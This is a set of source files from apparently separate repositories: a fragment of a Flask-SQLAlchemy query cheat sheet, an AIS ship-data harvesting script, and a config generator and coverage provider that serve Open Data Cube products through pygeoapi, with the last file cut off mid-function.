    Users whose password is '<PASSWORD>' or whose email ends with 'itheima.com':
        User.query.filter(or_(User.password =='<PASSWORD>',User.email.endswith('itheima.com'))).all()
    Users with id in [1, 3, 5, 7, 9] (see the sketch after this file)
    Role of the user named 'liu':
        User.query.filter(User.name == 'liu').first().role
    All users ordered by email:
        User.query.order_by(User.email.desc()).all()
    3 per page, page 2 (see the sketch after this file)
"""
app.run()
``` |
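Hedged sketches for the two items left open in the cheat sheet above, using standard Flask-SQLAlchemy query APIs (the keyword form of `paginate` shown here matches recent Flask-SQLAlchemy releases):
```python
# users with id in [1, 3, 5, 7, 9]
User.query.filter(User.id.in_([1, 3, 5, 7, 9])).all()

# 3 per page, second page
User.query.paginate(page=2, per_page=3).items
```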
{
"source": "52North/MariDataHarvest",
"score": 3
} |
#### File: MariDataHarvest/Harvester/main.py
```python
import argparse
import logging
import os
import shutil
import time
import traceback
from pathlib import Path
from ais import download_year_AIS, subsample_year_AIS_to_CSV, download_file, get_files_list, subsample_file
from utilities.helper_functions import Failed_Files, SaveToFailedList, init_Failed_list, FileFailedException, check_dir
from EnvironmentalData.weather import append_to_csv
logger = logging.getLogger(__name__)
def years_arg_parser(input: str) -> list[int]:
years = input.split('-')
choices = list(range(2009, 2022))
if len(years) == 2:
start = years[0]
end = years[1]
try:
if int(start) in choices and int(end) in choices:
if start < end:
return list(range(int(start), int(end) + 1))
elif start == end:
return [start]
raise ValueError
except Exception:
raise argparse.ArgumentTypeError(
"'" + input + "' is not Valid. Expected input 'YYYY' , 'YYYY-YYYY' or 'YYYY,YYYY,YYYY'.")
years = input.split(',')
if len(years) > 1:
try:
parsed_years = [int(y) for y in years if int(y) in choices]
if len(parsed_years) < len(years):
raise ValueError
return parsed_years
except ValueError as e:
raise argparse.ArgumentTypeError(
"'" + input + "' is not Valid. Expected input 'YYYY' , 'YYYY-YYYY' or 'YYYY,YYYY,YYYY'.")
if len(years) == 1:
try:
parsed_y = int(input)
if not parsed_y in choices:
raise ValueError
return [parsed_y]
except ValueError as e:
raise argparse.ArgumentTypeError(
"'" + input + "' is not Valid. Expected input 'YYYY' , 'YYYY-YYYY' or 'YYYY,YYYY,YYYY'.")
def init_directories(dir, year, minutes):
download_dir = Path(dir, str(year))
merged_dir = Path(dir, str(year) + '_merged_%s' % minutes)
filtered_dir = Path(dir, '{0}_filtered_{1}'.format(str(year), minutes))
download_dir.mkdir(parents=True, exist_ok=True)
merged_dir.mkdir(parents=True, exist_ok=True)
filtered_dir.mkdir(parents=True, exist_ok=True)
return download_dir, filtered_dir, merged_dir
if __name__ == '__main__':
# arguments parameters
parser = argparse.ArgumentParser(
description='For a given a year and minutes interval of subsampling to start harvesting AIS-Data.',
epilog='The following exit codes are configured:\n16 -> service secrets configuration file not found.')
parser.add_argument('-y', '--year',
help="A given year to start a task. Expected input 'YYYY' , 'YYYY-YYYY' or 'YYYY,YYYY,YYYY'",
required=True, type=years_arg_parser)
parser.add_argument('-m', '--minutes', help='A given minutes interval to downscale the data.',
required=True, type=int, choices=range(1, 1440))
parser.add_argument('-s', '--step', help='Select the specific step to perform.',
required=False, type=int, choices=range(0, 4), default=0)
parser.add_argument('-d', '--dir',
help='The output directory to collect csv files. By default the root directory is used.',
default='', type=str, required=False)
parser.add_argument('-c', '--clear',
help='Clears the raw output directory in order to free memory.',
action='store_true')
    parser.add_argument('-f', '--depth-first',
                        help='Process depth-first: download, subsample and merge each file before moving to the next.',
                        action='store_true')
args, unknown = parser.parse_known_args()
arg_string = 'Starting a task for year(s) %s with subsampling of %d minutes' % (
','.join(list(map(str, args.year))).join(['[', ']']), int(args.minutes))
    logger.info(arg_string + '. The output files will be saved to %s' % (args.dir if args.dir != '' else 'project directory'))
args.dir = Path().absolute().parent if args.dir == '' else Path(args.dir)
init_Failed_list(arg_string, args.dir)
for year in args.year:
logger.info('Processing year %s' % str(year))
# initialize directories
download_dir, filtered_dir, merged_dir = init_directories(args.dir, year, args.minutes)
merged_dir_list = check_dir(merged_dir)
filtered_dir_list = check_dir(filtered_dir)
download_dir_list = check_dir(download_dir)
if args.depth_first:
logger.info('Task is started using Depth-first mode')
for file in get_files_list(year, exclude_to_resume=merged_dir_list):
file_name = file.split('.')[0] + '.csv'
file_failed = False
interval = 10
while True:
try:
if (args.step == 1 or not file_name in filtered_dir_list) and not file_name in download_dir_list:
logger.info('STEP 1/3 downloading AIS data: %s' % file)
file_name = download_file(file, download_dir, year)
break
except FileFailedException as e:
logger.error(traceback.format_exc())
logger.error('Error when downloading AIS data')
if interval > 40:
Failed_Files.append(e.file_name)
logger.warning('Skipping steps 1, 2 and 3 for file %s after attempting %d times' % (
file, interval // 10))
SaveToFailedList(e.file_name, e.exceptionType, args.dir)
interval = 10
file_failed = True
break
logger.error('Re-run in {0} sec'.format(interval))
time.sleep(interval)
interval += 10
if args.step == 1:
continue
while True:
try:
if file_failed: break
if file_name in filtered_dir_list:
logger.info(
'STEP 2/3 File: %s has been already subsampled from a previous run.' % file_name)
break
logger.info('STEP 2/3 subsampling CSV data: %s' % file_name)
subsample_file(file_name, download_dir, filtered_dir, args.minutes)
break
except FileFailedException as e:
logger.error(traceback.format_exc())
logger.error('Error when subsampling CSV data')
if interval > 40:
Failed_Files.append(e.file_name)
logger.warning(
'Skipping steps 2, 3 for file %s after attempting %d times' % (file, interval // 10))
SaveToFailedList(e.file_name, e.exceptionType, args.dir)
interval = 10
file_failed = True
break
logger.error('Re-run in {0} sec'.format(interval))
time.sleep(interval)
interval += 10
if args.clear and not file_failed:
logger.info('Remove raw file %s' % file_name)
if Path(download_dir, file_name).exists():
os.remove(str(Path(download_dir, file_name)))
else:
logger.warning("File not found %s " % str(Path(download_dir, file_name)))
while True:
try:
if file_failed: break
logger.info('STEP 3/3 appending weather data: %s' % file_name)
append_to_csv(Path(filtered_dir, file_name), Path(merged_dir, file_name))
break
except FileFailedException as e:
logger.error(traceback.format_exc())
logger.error('Error when appending environment data')
if interval > 40:
Failed_Files.append(e.file_name)
logger.warning(
'Skipping step 3 for file %s after attempting %d times' % (file, interval // 10))
SaveToFailedList(e.file_name, e.exceptionType, args.dir)
break
logger.error('Re-run in {0} sec'.format(interval))
time.sleep(interval)
interval += 10
else:
if args.step != 0:
logger.info('Single step selected')
            if args.step == 0 or args.step == 1:
                interval = 10  # otherwise the except branch below would read it before assignment
                while True:
try:
logger.info('STEP 1/3 downloading AIS data')
# download AIS data
download_year_AIS(year, download_dir)
break
except FileFailedException as e:
logger.error(traceback.format_exc())
logger.error('Error when downloading AIS data')
if interval > 40:
Failed_Files.append(e.file_name)
logger.warning(
'Skipping step 1 for file %s after attempting %d times' % (e.file_name, interval // 10))
SaveToFailedList(e.file_name, e.exceptionType, args.dir)
interval = 10
logger.error('Re-run in {0} sec'.format(interval))
time.sleep(interval)
interval += 10
if args.step == 0 or args.step == 2:
# subset and filter data
interval = 10
while True:
try:
logger.info('STEP 2/3 subsampling CSV data')
subsample_year_AIS_to_CSV(str(year), download_dir, filtered_dir, args.minutes)
break
except FileFailedException as e:
logger.error(traceback.format_exc())
logger.error('Error when subsampling CSV data')
if interval > 40:
Failed_Files.append(e.file_name)
logger.warning('Skipping file step 2 for file %s after attempting %d times' % (
e.file_name, interval // 10))
SaveToFailedList(e.file_name, e.exceptionType, args.dir)
interval = 10
logger.error('Re-run in {0} sec'.format(interval))
time.sleep(interval)
interval += 10
if args.clear:
logger.info('Remove raw files and clear directory of year %s ' % str(download_dir))
if download_dir.exists():
shutil.rmtree(download_dir)
if args.step == 0 or args.step == 3:
# append weather data for each row in the filtered data
interval = 10
while True:
try:
logger.info('STEP 3/3 appending weather data')
                        for file in check_dir(filtered_dir):  # re-scan: step 2 may have added files
if Path(merged_dir, file).exists() or file in Failed_Files: continue
append_to_csv(Path(filtered_dir, file), Path(merged_dir, file))
break
except FileFailedException as e:
logger.error(traceback.format_exc())
logger.error('Error when appending environment data')
if interval > 40:
Failed_Files.append(e.file_name)
logger.warning(
'Skipping step 3 for file %s after attempting %d times' % (e.file_name, interval // 10))
SaveToFailedList(e.file_name, e.exceptionType, args.dir)
interval = 10
logger.error('Re-run in {0} sec'.format(interval))
time.sleep(interval)
interval += 10
``` |
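Illustrative examples of the `--year` formats `years_arg_parser` accepts after the fix above:
```python
# years_arg_parser('2015')       -> [2015]
# years_arg_parser('2012-2014')  -> [2012, 2013, 2014]
# years_arg_parser('2010,2015')  -> [2010, 2015]
```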
{
"source": "52North/pygeoapi-odc-provider",
"score": 2
} |
#### File: pygeoapi-odc-provider/src/create_config.py
```python
import logging
import logging.config
import os
from pathlib import Path
import yaml
import argparse
from odcprovider.connector import OdcConnector
from odcprovider.utils import convert_datacube_bbox_to_wgs84
from datacube.utils.geometry import BoundingBox
from datacube.model import DatasetType
logging_config_file = Path(Path(__file__).parent, 'logging.yaml')
level = logging.DEBUG
if os.path.exists(logging_config_file):
with open(logging_config_file, 'rt') as file:
try:
config = yaml.safe_load(file.read())
logging.config.dictConfig(config)
except Exception as e:
print(e)
print('Error while loading logging configuration from file "{}". Using defaults'
.format(logging_config_file))
logging.basicConfig(level=level)
else:
print('Logging file configuration does not exist: "{}". Using defaults.'.format(logging_config_file))
logging.basicConfig(level=level)
LOGGER = logging.getLogger(__name__)
# ToDo: improve formatting of created config.yaml
def parse_parameter() -> argparse.Namespace:
parser = argparse.ArgumentParser(
description='Create resource entries for pygeoapi configuration. If infile is '
'provided, resource entries will be inserted there and written to outfile.')
parser.add_argument('--infile', '-i',
help='File name of the config yaml that should be merged.')
parser.add_argument('--outfile', '-o',
default='config_auto.yml',
help='Output yaml file name (default: config_auto.yml)')
parser.add_argument('--exclude-products',
help='Comma separated list of product names to exclude')
args = parser.parse_args()
    if args.exclude_products:
        args.exclude_products = [s.strip() for s in args.exclude_products.split(",")]
    else:
        args.exclude_products = []  # keep the membership tests below from failing on None
LOGGER.info("""
Start creating pygeoapi config
==============================
- empty values are allowed
infile : {}
outfile : {}
exclude products : {}""".format(args.infile, args.outfile, args.exclude_products))
return args
def _create_resource_from_odc_product(product: DatasetType, bbox: BoundingBox, format_set: set) -> dict:
"""
Create resource from Open Data Cube product
:param product: ODC product, datacube.model.DatasetType
:param bbox: bbox in WGS84!!!
:param format_set: set of format strings (e.g. 'GeoTIFF' or 'netCDF')
:return: dict
"""
left, bottom, right, top = bbox
if product.fields['format'] is not None:
format_name = product.fields['format']
elif len(format_set) == 1:
format_name = next(iter(format_set))
else:
format_name = 'GeoTIFF'
links = []
if 'links' in product.metadata_doc.keys():
for link in product.metadata_doc.get('links'):
links.append({
'type': link.get('type'),
'rel': link.get('rel'),
'title': link.get('title'),
'href': link.get('href'),
'hreflang': link.get('hreflang')
})
resource_dict = {
'type': 'collection',
'title': product.name,
'description': product.definition['description'],
'keywords': product.metadata_doc.get('keywords') if 'keywords' in product.metadata_doc.keys() else [],
'links': links,
'extents': {
'spatial': {
'bbox': [left, bottom, right, top],
'crs': 'http://www.opengis.net/def/crs/OGC/1.3/CRS84'
}
},
'providers': [{
'type': 'coverage',
'name': 'odcprovider.OpenDataCubeCoveragesProvider',
'data': product.name,
'format': {
'name': format_name,
'mimetype': 'application/{}'.format(format_name.lower())
}
}],
}
return resource_dict
def _merge_config(infile, data):
"""
Insert auto-created resource entries into given config file if given
:param infile: file name of a pygeoapi yml config file
:param data: dict of resource entries
:return: merged dict of resource entries
"""
with open(infile, 'r') as infile:
data_in = yaml.load(infile, Loader=yaml.FullLoader)
for resource_entry in data['resources']:
data_in['resources'].update({resource_entry: data['resources'][resource_entry]})
return data_in
def main():
args = parse_parameter()
# Create collection for each datacube product that is not excluded
dc = OdcConnector()
data = {'resources': {}}
products = dc.list_product_names()
LOGGER.info("Start processing {} products in ODC instance".format(len(products)))
idx = 1
for dc_product_name in products:
LOGGER.info("[{}/{}] Processing product '{}'".format(idx, len(products), dc_product_name))
if dc_product_name in args.exclude_products:
LOGGER.info("[{}/{}] Product '{}' is list of products to exclude, hence skipping it"
.format(idx, len(products), dc_product_name))
else:
LOGGER.info("[{}/{}] Including product '{}'".format(idx, len(products), dc_product_name))
dc_product = dc.get_product_by_id(dc_product_name)
format_set = set()
for dataset in dc.get_datasets_for_product(dc_product.name):
format_set.add(dataset.format)
# Make sure bbox is in WGS84
if len(dc.get_crs_set(dc_product.name)) == 1:
bbox = convert_datacube_bbox_to_wgs84(dc.bbox_of_product(dc_product.name),
str(dc.get_crs_set(dc_product.name).pop()))
else:
bbox = dc.bbox_of_product(dc_product.name)
data['resources'][dc_product.name] = _create_resource_from_odc_product(dc_product, bbox, format_set)
idx = idx + 1
LOGGER.info("Finished processing {} products".format(len(products)))
# Write to yaml file, merge with provided config yaml if given
with open(args.outfile, 'w') as outfile:
if args.infile is not None:
data = _merge_config(args.infile, data)
LOGGER.debug("Writing configuration to file '{}':\n{}\n".format(outfile.name, data))
yaml.dump(data, outfile, default_flow_style=False, sort_keys=False)
LOGGER.info("Finished processing ODC products")
if __name__ == "__main__":
main()
```
#### File: src/odcprovider/coverages.py
```python
import logging
import json
# ToDo move to OdcConnector somehow
from datacube.utils.geometry import CRS as CRS_DATACUBE, BoundingBox
from pygeoapi.provider.base import (BaseProvider,
ProviderConnectionError,
ProviderGenericError,
ProviderQueryError,
ProviderInvalidQueryError,
ProviderNoDataError)
from pyproj import CRS, Transformer
from rasterio import Affine
from rasterio.io import MemoryFile
from .connector import OdcConnector
from .utils import meter2degree
import numpy as np
LOGGER = logging.getLogger(__name__)
CAST_MAP = {
'uint8': 'int16',
'uint16': 'int32',
'uint32': 'int64'
}
TYPE_URI_MAP = {
'int8': 'http://defs.opengis.net/vocprez/object?uri=http%3A//www.opengis.net/def/dataType/OGC/0/signedByte',
'int16': 'http://defs.opengis.net/vocprez/object?uri=http%3A//www.opengis.net/def/dataType/OGC/0/signedShort',
'int32': 'http://defs.opengis.net/vocprez/object?uri=http%3A//www.opengis.net/def/dataType/OGC/0/signedInt',
'int64': 'http://defs.opengis.net/vocprez/object?uri=http%3A//www.opengis.net/def/dataType/OGC/0/signedLong',
'uint8': 'http://defs.opengis.net/vocprez/object?uri=http%3A//www.opengis.net/def/dataType/OGC/0/unsignedByte',
'uint16': 'http://defs.opengis.net/vocprez/object?uri=http%3A//www.opengis.net/def/dataType/OGC/0/unsignedShort',
'uint32': 'http://defs.opengis.net/vocprez/object?uri=http%3A//www.opengis.net/def/dataType/OGC/0/unsignedInt',
'uint64': 'http://defs.opengis.net/vocprez/object?uri=http%3A//www.opengis.net/def/dataType/OGC/0/unsignedLong',
'float16': 'http://defs.opengis.net/vocprez/object?uri=http://www.opengis.net/def/dataType/OGC/0/float16',
'float32': 'http://defs.opengis.net/vocprez/object?uri=http://www.opengis.net/def/dataType/OGC/0/float32',
'float64': 'http://defs.opengis.net/vocprez/object?uri=http://www.opengis.net/def/dataType/OGC/0/float64',
'float128': 'http://defs.opengis.net/vocprez/object?uri=http://www.opengis.net/def/dataType/OGC/0/float128',
'double': 'http://defs.opengis.net/vocprez/object?uri=http%3A//www.opengis.net/def/dataType/OGC/0/double'
}
class OpenDataCubeCoveragesProvider(BaseProvider):
"""OpenDataCube Provider
This provider plugin maps an OGC collection to an ODC product
"""
def __init__(self, provider_def):
"""
Initialize object
:param provider_def: provider definition
:returns: pygeoapi.provider.rasterio_.RasterioProvider
"""
super().__init__(provider_def)
self.dc = OdcConnector()
if self.data not in self.dc.list_product_names():
raise ProviderGenericError("Configured product '{}' is not contained in OpenDataCube instance"
.format(self.data))
LOGGER.info('Start initializing product {}'.format(self.data))
try:
# datacube.utils.geometry.CRS
self.crs_obj = None
self.native_format = provider_def['format']['name']
self._coverage_properties = self._get_coverage_properties(self._get_bbox())
self._measurement_properties = self._get_measurement_properties()
# axes, crs and num_bands is need for coverage providers
# (see https://github.com/geopython/pygeoapi/blob/master/pygeoapi/provider/base.py#L65)
self.axes = self._coverage_properties['axes']
self.crs = self._coverage_properties['crs_uri']
self.num_bands = self._coverage_properties['num_bands']
self.fields = [field['name'] for field in self._measurement_properties]
LOGGER.info('Finished initializing product {}'.format(self.data))
except Exception as err:
LOGGER.warning(err)
raise ProviderConnectionError(err)
def query(self, range_subset=[], subsets={}, bbox=[], datetime_=None,
format_='json', **kwargs):
"""
Extract data from collection
:param range_subset: list of bands
:param subsets: dict of subset names with lists of ranges
:param bbox: bounding box [minx,miny,maxx,maxy]
:param datetime_: temporal (datestamp or extent)
:param format_: data format of output
:returns: coverage data as dict of CoverageJSON or native format
"""
# ---------------- #
# Query parameters (https://ogcapi.ogc.org/coverages/overview.html)
# url: {datasetAPI}/collections/{coverageid}/coverage
# Subset with well-defined ranges for named axes
# ?subset=Lat(40:50),Lon(10: 20)
# ?subset=time("2019-03-27")
# Band subset
# ?rangeSubset=B02,B03,B04
# Bbox (in WGS84 or WGS84h)
# ?bbox=10,40,20,50
# Scaling
# ?scaleSize=Lon(800),Lat(400)
# ?scaleFactor=2
# ?scaleAxes=Lon(2)
# ---------------- #
bands = range_subset
LOGGER.info('Bands: {}, subsets: {}, bbox: {}'.format(bands, subsets, bbox))
# initial bbox, full extent of collection
minx, miny, maxx, maxy = self._coverage_properties['bbox']
if all([not bands, not subsets, not bbox]):
LOGGER.info('No parameters specified')
if all([self._coverage_properties['x_axis_label'] not in subsets,
self._coverage_properties['y_axis_label'] not in subsets,
not bbox]):
msg = 'spatial subsetting via bbox parameter or subset is mandatory'
LOGGER.warning(msg)
raise ProviderInvalidQueryError(msg)
if all([self._coverage_properties['x_axis_label'] in subsets,
self._coverage_properties['y_axis_label'] in subsets,
len(bbox) > 0]):
msg = 'bbox and subsetting by coordinates are exclusive'
LOGGER.warning(msg)
raise ProviderInvalidQueryError(msg)
# -------------- #
# Spatial subset #
# -------------- #
if len(bbox) > 0:
# fixed by specification
crs_src = CRS.from_epsg(4326)
crs_dest = CRS.from_epsg(self.crs_obj.to_epsg())
LOGGER.debug('Source EPSG: {}'.format(crs_src.to_epsg()))
LOGGER.debug('Target EPSG: {}'.format(crs_dest.to_epsg()))
if crs_src == crs_dest:
LOGGER.info('source bbox CRS and data CRS are the same')
minx, miny, maxx, maxy = bbox
else:
LOGGER.info('source bbox CRS and data CRS are different')
LOGGER.info('reprojecting bbox into native coordinates')
minxbox, minybox, maxxbox, maxybox = bbox
t = Transformer.from_crs(crs_src, crs_dest, always_xy=True)
minx, miny = t.transform(minxbox, minybox)
maxx, maxy = t.transform(maxxbox, maxybox)
LOGGER.info('Source coordinates in {}: {}'.format(
crs_src.to_epsg(),
[minxbox, minybox, maxxbox, maxybox]))
LOGGER.info('Destination coordinates in {}: {}'.format(
crs_dest.to_epsg(),
[minx, miny, maxx, maxy]))
elif (self._coverage_properties['x_axis_label'] in subsets and
self._coverage_properties['y_axis_label'] in subsets):
LOGGER.info('Creating spatial subset')
x = self._coverage_properties['x_axis_label']
y = self._coverage_properties['y_axis_label']
minx = subsets[x][0]
maxx = subsets[x][1]
miny = subsets[y][0]
maxy = subsets[y][1]
# ToDo consider resolution in next development iteration
if minx > maxx or miny > maxy:
msg = 'spatial subsetting invalid min > max'
LOGGER.warning(msg)
raise ProviderInvalidQueryError(msg)
if self.data != 'landsat8_c2_l2':
if self.crs_obj.projected:
max_allowed_delta = 7500
else:
max_allowed_delta = 0.125
if maxx - minx > max_allowed_delta:
msg = 'spatial subsetting too large {}. please request max {}'.format(maxx - minx, max_allowed_delta)
LOGGER.warning(msg)
raise ProviderInvalidQueryError(msg)
if maxy - miny > max_allowed_delta:
msg = 'spatial subsetting too large {}. please request max {}'.format(maxy - miny, max_allowed_delta)
LOGGER.warning(msg)
raise ProviderInvalidQueryError(msg)
# ---------------------- #
# Load data via datacube #
# ---------------------- #
# Note:
# - resolution and align expect the following coordinate order: (y, x)
# - datacube.Datacube.load accepts all of the following parameters for spatial subsets independent of the crs:
# 'latitude' or 'lat' or 'y' / 'longitude' or 'lon' or 'long' or 'x'
# - See for details on parameters and load() method:
# https://datacube-core.readthedocs.io/en/latest/dev/api/generate/datacube.Datacube.load.html#datacube-datacube-load
params = {
'crs': 'epsg:{}'.format(self.crs_obj.to_epsg()),
'x': (minx, maxx),
'y': (miny, maxy),
"align": (abs(self._coverage_properties['resy'] / 2),
abs(self._coverage_properties['resx'] / 2)),
'resolution': (self._coverage_properties['resy'], self._coverage_properties['resx']),
'output_crs': 'epsg:{}'.format(self.crs_obj.to_epsg()),
# 'resampling': 'nearest' # nearest is the default value
}
if len(bands) > 0:
params['measurements'] = bands
# ToDo: enable output in different crs? Does API Coverages support this?
# ToDo: check if re-projection is necessary
LOGGER.debug('RAW params for dc.load:\n{}'.format(json.dumps(params, indent=4)))
LOGGER.debug('self.data: "{}"'.format(self.data))
LOGGER.debug('Load data from ODC...')
dataset = self.dc.load(product=self.data, **params)
if len(list(dataset.keys())) == 0:
LOGGER.debug('...request resulted in empty dataset')
raise ProviderNoDataError('An empty dataset was returned. Please check your request.')
else:
LOGGER.debug('...received data')
# Use 'dataset.time.attrs.pop('units', None)' to prevent the following error:
# "ValueError: failed to prevent overwriting existing key units in attrs on variable 'time'.
# This is probably an encoding field used by xarray to describe how a variable is serialized.
# To proceed, remove this key from the variable's attributes manually."
# Check for existence to "prevent AttributeError: 'Dataset' object has no attribute 'time'"
if hasattr(dataset, 'time') and dataset.time is not None and hasattr(dataset.time, 'attrs') and \
dataset.time.attrs is not None:
dataset.time.attrs.pop('units', None)
# ----------------- #
# Return data #
# ----------------- #
if len(bands) == 0:
# if no bands are specified in the request ODC loads all bands by default
bands = list(dataset.keys())
out_meta = {
'bbox': [minx, miny, maxx, maxy],
'width': abs((maxx - minx) / self._coverage_properties['resx']),
'height': abs((maxy - miny) / self._coverage_properties['resy']),
'bands': bands
}
if self.options is not None:
LOGGER.info('Adding dataset options')
for key, value in self.options.items():
out_meta[key] = value
LOGGER.debug('Processed dataset')
if format_ == 'json':
LOGGER.info('Creating output in CoverageJSON')
return self.gen_covjson(out_meta, dataset)
elif format_.lower() == 'geotiff':
LOGGER.info('Returning data as GeoTIFF')
# ToDo: check if there is more than one time slice
out_meta['driver'] = 'GTiff'
out_meta['crs'] = self.crs_obj.to_epsg()
out_meta['dtype'] = self._measurement_properties[0]['dtype']
out_meta['nodata'] = self._measurement_properties[0]['nodata']
out_meta['count'] = len(bands)
out_meta['transform'] = Affine(self._coverage_properties['resx'],
0.0,
minx,
0.0,
self._coverage_properties['resy'],
maxy)
LOGGER.debug("out_meta:\n{}".format(json.dumps(out_meta, indent=4)))
LOGGER.debug('Writing to in-memory file')
with MemoryFile() as memfile:
with memfile.open(**out_meta) as dest:
# input is expected as (bands, rows, cols)
dest.write(np.stack(
[dataset.squeeze(dim='time', drop=True)[band].values for band in bands],
axis=0)
)
LOGGER.debug('Finished writing to in-memory file')
return memfile.read()
else:
LOGGER.info('Returning data as netCDF')
# ToDo: what if different measurements have different dtypes?
for data_var in dataset.data_vars:
dtype = dataset[data_var].dtype.name
break
# scipy cannot save arrays with unsigned type to netCDF
if dtype.startswith('u'):
dataset = dataset.astype(CAST_MAP[dtype], copy=False)
# Note: "If no path is provided, this function returns the resulting netCDF file as bytes; in this case,
# we need to use scipy, which does not support netCDF version 4 (the default format becomes NETCDF3_64BIT)."
# (http://xarray.pydata.org/en/stable/generated/xarray.Dataset.to_netcdf.html)
# ToDo: implement netCDF version 4 option using in-memory file with lib netCDF4
# (http://unidata.github.io/netcdf4-python/#in-memory-diskless-datasets)
# see also https://stackoverflow.com/questions/46433812/simple-conversion-of-netcdf4-dataset-to-xarray-dataset
return dataset.to_netcdf()
def gen_covjson(self, metadata, dataset):
"""
Generate coverage as CoverageJSON representation
:param metadata: coverage metadata
:param dataset: xarray Dataset object
:returns: dict of CoverageJSON representation
"""
# ToDo: support time dimension
LOGGER.info('Creating CoverageJSON domain')
minx, miny, maxx, maxy = metadata['bbox']
cj = {
'type': 'Coverage',
'domain': {
'type': 'Domain',
'domainType': 'Grid',
'axes': {
'x': {
'start': minx,
'stop': maxx,
'num': metadata['width']
},
'y': {
'start': miny,
'stop': maxy,
'num': metadata['height']
}
},
'referencing': [{
'coordinates': ['x', 'y'],
'system': {
'type': self._coverage_properties['crs_type'],
'id': self._coverage_properties['crs_uri']
}
}]
},
'parameters': {},
'ranges': {}
}
bands_select = metadata['bands']
LOGGER.info('bands selected: {}'.format(bands_select))
for bs in bands_select:
parameter = {
'type': 'Parameter',
'description': bs,
'unit': {
'symbol': dataset[bs].attrs['units']
},
'observedProperty': {
'id': bs,
'label': {
'en': bs
}
}
}
cj['parameters'][bs] = parameter
# ToDo: check shape/axis order!
try:
for key in cj['parameters'].keys():
cj['ranges'][key] = {
'type': 'NdArray',
'dataType': str(dataset[key].dtype),
'axisNames': ['y', 'x'],
'shape': [metadata['height'], metadata['width']],
}
cj['ranges'][key]['values'] = dataset[key].values.flatten().tolist()
except IndexError as err:
LOGGER.warning(err)
raise ProviderQueryError('Invalid query parameter')
return cj
def get_coverage_domainset(self):
"""
Provide coverage domainset
:returns: CIS JSON object of domainset metadata
"""
# The grid may be very large and contain a lot of nodata values.
# Does the (draft) spec of API Coverages provide means to indicate where useful data is actually?
domainset = {
'type': 'DomainSet',
'generalGrid': {
'type': 'GeneralGridCoverage',
'srsName': self._coverage_properties['crs_uri'],
'axisLabels': [
self._coverage_properties['x_axis_label'],
self._coverage_properties['y_axis_label']
],
'axis': [{
'type': 'RegularAxis',
'axisLabel': self._coverage_properties['x_axis_label'],
'lowerBound': self._coverage_properties['bbox'][0],
'upperBound': self._coverage_properties['bbox'][2],
'uomLabel': self._coverage_properties['bbox_units'],
'resolution': self._coverage_properties['resx']
}, {
'type': 'RegularAxis',
'axisLabel': self._coverage_properties['y_axis_label'],
'lowerBound': self._coverage_properties['bbox'][1],
'upperBound': self._coverage_properties['bbox'][3],
'uomLabel': self._coverage_properties['bbox_units'],
'resolution': self._coverage_properties['resy']
}],
'gridLimits': {
'type': 'GridLimits',
'srsName': 'http://www.opengis.net/def/crs/OGC/0/Index2D',
'axisLabels': ['i', 'j'],
'axis': [{
'type': 'IndexAxis',
'axisLabel': 'i',
'lowerBound': 0,
'upperBound': self._coverage_properties['width']
}, {
'type': 'IndexAxis',
'axisLabel': 'j',
'lowerBound': 0,
'upperBound': self._coverage_properties['height']
}]
}
},
}
return domainset
def get_coverage_rangetype(self):
"""
Provide coverage rangetype
:returns: CIS JSON object of rangetype metadata
"""
fields = []
for row in range(0, len(self._measurement_properties)):
fields.append({
"id": self._measurement_properties[row]['id'],
"type": "Quantity",
"name": self._measurement_properties[row]['name'],
# "definition": "http://opengis.net/def/property/OGC/0/Radiance", # ToDo: get correct definition (semantics) for arbitrary fields
"nodata": self._measurement_properties[row]['nodata'],
"uom": {
# "id": "http://www.opengis.net/def/uom/UCUM/[C]", # ToDo: get correct uri for arbitrary units
"type": "UnitReference",
"code": self._measurement_properties[row]['unit']
},
"encodingInfo": {
"dataType": TYPE_URI_MAP[self._measurement_properties[row]['dtype']] or self._measurement_properties[row]['dtype']
},
"_meta": {
"tags": {
"Aliases": self._measurement_properties[row]['aliases']
if self._measurement_properties[row]['aliases'] is not None else "NaN",
}
}
})
rangetype = {
"type": "DataRecord",
"field": fields
}
return rangetype
def _get_bbox(self) -> BoundingBox:
bbox = self.dc.bbox_of_product(self.data)
LOGGER.info('bbox of product {}: {}'.format(self.data, bbox))
return bbox
def _get_coverage_properties(self, bbox: BoundingBox) -> dict:
"""
Helper function to normalize coverage properties
:returns: `dict` of coverage properties
"""
# Note that in Open Data Cube:
# - some metadata are specified on product level and some on dataset level or even on both (e.g. crs)
# - some product level metadata are optional, thus they may not be available for all products
# - different datasets for the same product may have different crs
# - different datasets for the same product or different measurements within one dataset may have different resolutions
# ------------------------------- #
# Get metadata and do some checks #
# ------------------------------- #
crs_set = self.dc.get_crs_set(self.data)
resolution_set = self.dc.get_resolution_set(self.data)
bbox = self._get_bbox()
if len(crs_set) > 1:
LOGGER.warning("Product {} has datasets with different coordinate reference systems. "
"All datasets will be assumed to have WGS84 as native crs from now on.".format(self.data))
self.crs_obj = CRS_DATACUBE('epsg:4326')
else:
self.crs_obj = next(iter(crs_set))
if len(resolution_set) > 1:
msg = "Product {} has datasets with different spatial resolutions. This is not supported yet. " \
"Please check and change your Open Data Cube dataset definitions.".format(self.data)
LOGGER.warning(msg)
raise ProviderQueryError(msg)
else:
res = next(iter(resolution_set))
resx = resx_native = res[0]
resy = resy_native = res[1]
# Resolution has to be converted if ODC storage crs and collection crs differ and ODC storage crs is projected.
# We assume there is no mixture of geographic and projected reference systems in the datasets.
# Conversion:
# 1° difference in latitude and longitude - for longitude this is only true at the equator;
# the distance is short when moving towards the poles - is approx. 111 km. We apply a simple conversion
# using the factor 100,000 to obtain a reasonable grid.
# ToDo: review the conversion from meter to degree
if len(crs_set) > 1 and next(iter(crs_set)).projected:
resx = meter2degree(resx_native)
resy = meter2degree(resy_native)
LOGGER.warning("Using WGS84 instead of storage crs. "
"Resolution is converted from {} to {}".format((resx_native, resy_native), (resx, resy)))
# ToDo: support different crs/resolution for different datasets including reprojection
# and resampling (need to wait for API Coverages spec extensions)
# -------------- #
# Set properties #
# -------------- #
properties = {
'bbox': [
bbox.left,
bbox.bottom,
bbox.right,
bbox.top
],
'crs_uri': 'http://www.opengis.net/def/crs/OGC/1.3/CRS84',
'crs_type': 'GeographicCRS',
'bbox_units': 'deg',
'x_axis_label': 'Lon',
'y_axis_label': 'Lat',
'width': abs((bbox.right - bbox.left) / abs(resx)),
'height': abs((bbox.top - bbox.bottom) / abs(resy)),
'resx': resx,
'resy': resy,
'num_bands': (self.dc.number_of_bands(self.data)),
}
if self.crs_obj.projected:
